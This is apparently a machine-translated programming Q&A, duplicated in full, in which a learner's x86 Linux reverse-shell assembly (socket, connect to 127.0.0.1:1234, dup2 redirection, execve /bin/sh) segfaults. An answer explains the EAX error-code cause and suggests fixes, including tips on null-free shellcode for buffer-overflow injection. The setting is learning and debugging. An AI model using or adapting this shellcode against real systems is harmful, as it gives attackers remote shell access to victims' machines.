linux x86 asm 中的段错误反向 shell
segfault reverse shell in linux x86 asm
我正在学习汇编并从 linux x86 开始。我现在正在尝试创建一个反向 shell 但我正面临一个段错误,我不知道它在哪里。
这是我的汇编代码:
global _start
section .text
_start:
; Création du socket
push 0x66 ; socketall (102)
pop eax ; clean eax et mis en place socketcall(102)
push 0x1 ; sys_socket
pop ebx ; clean ebb et mis en place sys_socket (1)
xor ecx, ecx ; pour éviter les 0, on xor un registre avec lui-même ce qui donne toujours 0
push ecx ; protocole 0 ce qui signifie que le protocole est défini par la machine
push ebx ; SOCK_STREAM (1)
push 0x2 ; AF_INET (2) signifie la prise en charge d'adresse IPV4
mov ecx, esp ; pointe ecx en haut de la pile
int 0x80 ; execution
mov edi, eax ; move socket vers edi pour réutilisation
; Connection à une adresse IP et un port
mov al, 0x66 ; socketcall (102) déplacé dans le registre al
pop ebx ; (2)
push 0x0100007F ; sin_addr = 127.0.0.1
push word 0xd204 ; sin_port = 1234
push word 0x2 ; AF_INET (2)
mov ecx, esp ; pointe ecx en haut de la pile
push 0x10 ; taille de l'adresse IP
push ecx ; pointer vers l'adresse ip
push edi ; socket descripteur = permet de stocker les valeurs retournées par le syscall socket et le syscall qui accepte la connexion
mov ecx, esp ; pointe ecx en haut de la pile
inc ebx ; SYS_CONNECT (3)
int 0x80 ; execution
; STDIN, STDOUT et STDERR dans notre nouveau socket pour redirection
xchg ebx, edi ; save de socketfd dans ebx pour dup2. Xchg permet d'échanger les contenus de la destination (premier registre) et de la source (second registre
;dup 2 = créer une copie du file descriptor oldfd en utilisant le numéro spécifié dans newfd. Si le file descriptor newfd était déjà utilisé, cela le ferme avant de pouvoir être utilisé.
push 0x2
pop ecx ; set ecx à 0
loop:
mov al, 0x3f ; dup2 sys call 63 = 0x3f
int 0x80 ; execution dup2
dec ecx ; décrémentation du compteur de la loop
jns loop ; JNS = Jump No Sign (valeur positive) -> tant que SF n'est pas positionné à 1 on jmp à loop
; SF = Ce flag est positionné à 1 si la dernière opération a généré un résultat négatif, à 0 s'il est positif ou nul.
; Executer /bin/sh
xor edx, edx ; set edx à 0
push edx ; NULL
push 0x68732f2f ; "hs//" reverse order car utilisation de little endian (2 / pour faire 4 octets non nuls)
push 0x6e69622f ; "nib/" reverse order car utilisation de little endian
mov ebx, esp ; pointe ebx dans la stack c-a-d en haut de la pile
mov ecx, edx ; on met ecx à 0
mov al, 0xb ; execve = Oxb
int 0x80 ; execution execve
然后我做了:
nasm -f elf32 tp.asm
然后
ld -m elf_i386 -s -o tp tp.o
当我执行二进制文件时出现错误:分段错误
我试过用gdb调试,但我了解的不多
gdb tp
(gdb) run
Starting program: /home/nicolas/tp/tp
Program received signal SIGSEGV, Segmentation fault.
0x0804904d in ?? ()
(gdb) where
#0 0x0804904d in ?? ()
老实说,我现在不知道该怎么办...没有足够的知识来进一步。
我希望有人能帮助我。谢谢:)
编辑:
这里是地址0x0804904d对应的指令:
0x804904d add %al,(%eax)
我使用了 strace,这是输出:
execve("./tp", ["./tp"], 0x7ffe08f13850 /* 49 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connexion refusée)
syscall_0xffffffffffffff3f(0x3, 0x2, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff3f(0x3, 0x1, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff3f(0x3, 0, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff0b(0xff911f58, 0, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffda} ---
+++ killed by SIGSEGV +++
您的 strace 输出使问题变得清晰:connect returns 一个错误代码(在 -4095 到 -1 之间),所以高字节的 EAX 是 0xffffff..。后来 mov al, imm81 保持不变,导致 EAX= 无效的系统调用号 2.
如果你想让它干净地退出,即使之前的系统调用 returned 否定,xor eax,eax / inc eax / int 0x80 在最后做一个 SYS_exit.(BL=1 或一些非零值以非零状态退出)。
或者使用 push 0xb / pop eax 为最后的系统调用设置 EAX=SYS_execve,所以 shell 肯定是 运行。 (但是没有重定向标准输入,所以这不是很好)。
或者只是习惯使用 strace 作为错误检查,现在您已经了解当系统调用 return 值使 EAX 的高字节非零时会发生什么. 你可以在最后放一个 ud2 这样它会以非法指令而不是段错误退出(当执行落入 00 00 add [eax], al 字节时。)
或者如果你真的想要,为 connect 系统调用编写实际的错误检查,检查负 EAX 并使用 write 在退出前输出错误消息。这在真正的 shell 代码中显然是无用的,它 运行 的标准输出连接到受害者计算机上的某个东西,而不是你的。 connect 是最有可能失败的一个,因此除了 strace.
之外,您仍然可以不检查其他系统调用。
脚注 1:请记住您使用 mov al, 0xb 而不是 mov eax, 0xb 来避免机器代码中出现零,尽管 push 0x0100007F 不会那样做。 >.< 构建为可执行文件时没有问题,但通过 strcpy 或其他 C 字符串缓冲区溢出漏洞注入时会出现问题。
脚注 2:显然 strace 或内核正在将其符号扩展到 64 位,尽管事实上在 32 位模式下无法访问完整的 RAX。
我正在学习汇编并从 linux x86 开始。我现在正在尝试创建一个反向 shell 但我正面临一个段错误,我不知道它在哪里。 这是我的汇编代码:
global _start
section .text
_start:
; Création du socket
push 0x66 ; socketall (102)
pop eax ; clean eax et mis en place socketcall(102)
push 0x1 ; sys_socket
pop ebx ; clean ebb et mis en place sys_socket (1)
xor ecx, ecx ; pour éviter les 0, on xor un registre avec lui-même ce qui donne toujours 0
push ecx ; protocole 0 ce qui signifie que le protocole est défini par la machine
push ebx ; SOCK_STREAM (1)
push 0x2 ; AF_INET (2) signifie la prise en charge d'adresse IPV4
mov ecx, esp ; pointe ecx en haut de la pile
int 0x80 ; execution
mov edi, eax ; move socket vers edi pour réutilisation
; Connection à une adresse IP et un port
mov al, 0x66 ; socketcall (102) déplacé dans le registre al
pop ebx ; (2)
push 0x0100007F ; sin_addr = 127.0.0.1
push word 0xd204 ; sin_port = 1234
push word 0x2 ; AF_INET (2)
mov ecx, esp ; pointe ecx en haut de la pile
push 0x10 ; taille de l'adresse IP
push ecx ; pointer vers l'adresse ip
push edi ; socket descripteur = permet de stocker les valeurs retournées par le syscall socket et le syscall qui accepte la connexion
mov ecx, esp ; pointe ecx en haut de la pile
inc ebx ; SYS_CONNECT (3)
int 0x80 ; execution
; STDIN, STDOUT et STDERR dans notre nouveau socket pour redirection
xchg ebx, edi ; save de socketfd dans ebx pour dup2. Xchg permet d'échanger les contenus de la destination (premier registre) et de la source (second registre
;dup 2 = créer une copie du file descriptor oldfd en utilisant le numéro spécifié dans newfd. Si le file descriptor newfd était déjà utilisé, cela le ferme avant de pouvoir être utilisé.
push 0x2
pop ecx ; set ecx à 0
loop:
mov al, 0x3f ; dup2 sys call 63 = 0x3f
int 0x80 ; execution dup2
dec ecx ; décrémentation du compteur de la loop
jns loop ; JNS = Jump No Sign (valeur positive) -> tant que SF n'est pas positionné à 1 on jmp à loop
; SF = Ce flag est positionné à 1 si la dernière opération a généré un résultat négatif, à 0 s'il est positif ou nul.
; Executer /bin/sh
xor edx, edx ; set edx à 0
push edx ; NULL
push 0x68732f2f ; "hs//" reverse order car utilisation de little endian (2 / pour faire 4 octets non nuls)
push 0x6e69622f ; "nib/" reverse order car utilisation de little endian
mov ebx, esp ; pointe ebx dans la stack c-a-d en haut de la pile
mov ecx, edx ; on met ecx à 0
mov al, 0xb ; execve = Oxb
int 0x80 ; execution execve
然后我做了:
nasm -f elf32 tp.asm
然后
ld -m elf_i386 -s -o tp tp.o
当我执行二进制文件时出现错误:分段错误
我试过用gdb调试,但我了解的不多
gdb tp
(gdb) run
Starting program: /home/nicolas/tp/tp
Program received signal SIGSEGV, Segmentation fault.
0x0804904d in ?? ()
(gdb) where
#0 0x0804904d in ?? ()
老实说,我现在不知道该怎么办...没有足够的知识来进一步。 我希望有人能帮助我。谢谢:)
编辑:
这里是地址0x0804904d对应的指令:
0x804904d add %al,(%eax)
我使用了 strace,这是输出:
execve("./tp", ["./tp"], 0x7ffe08f13850 /* 49 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connexion refusée)
syscall_0xffffffffffffff3f(0x3, 0x2, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff3f(0x3, 0x1, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff3f(0x3, 0, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
syscall_0xffffffffffffff0b(0xff911f58, 0, 0, 0, 0x3, 0) = -1 ENOSYS (Fonction non implantée)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffda} ---
+++ killed by SIGSEGV +++
您的 strace 输出使问题变得清晰:connect returns 一个错误代码(在 -4095 到 -1 之间),所以高字节的 EAX 是 0xffffff..。后来 mov al, imm81 保持不变,导致 EAX= 无效的系统调用号 2.
如果你想让它干净地退出,即使之前的系统调用 returned 否定,xor eax,eax / inc eax / int 0x80 在最后做一个 SYS_exit.(BL=1 或一些非零值以非零状态退出)。
或者使用 push 0xb / pop eax 为最后的系统调用设置 EAX=SYS_execve,所以 shell 肯定是 运行。 (但是没有重定向标准输入,所以这不是很好)。
或者只是习惯使用 strace 作为错误检查,现在您已经了解当系统调用 return 值使 EAX 的高字节非零时会发生什么. 你可以在最后放一个 ud2 这样它会以非法指令而不是段错误退出(当执行落入 00 00 add [eax], al 字节时。)
或者如果你真的想要,为 connect 系统调用编写实际的错误检查,检查负 EAX 并使用 write 在退出前输出错误消息。这在真正的 shell 代码中显然是无用的,它 运行 的标准输出连接到受害者计算机上的某个东西,而不是你的。 connect 是最有可能失败的一个,因此除了 strace.
脚注 1:请记住您使用 mov al, 0xb 而不是 mov eax, 0xb 来避免机器代码中出现零,尽管 push 0x0100007F 不会那样做。 >.< 构建为可执行文件时没有问题,但通过 strcpy 或其他 C 字符串缓冲区溢出漏洞注入时会出现问题。
脚注 2:显然 strace 或内核正在将其符号扩展到 64 位,尽管事实上在 32 位模式下无法访问完整的 RAX。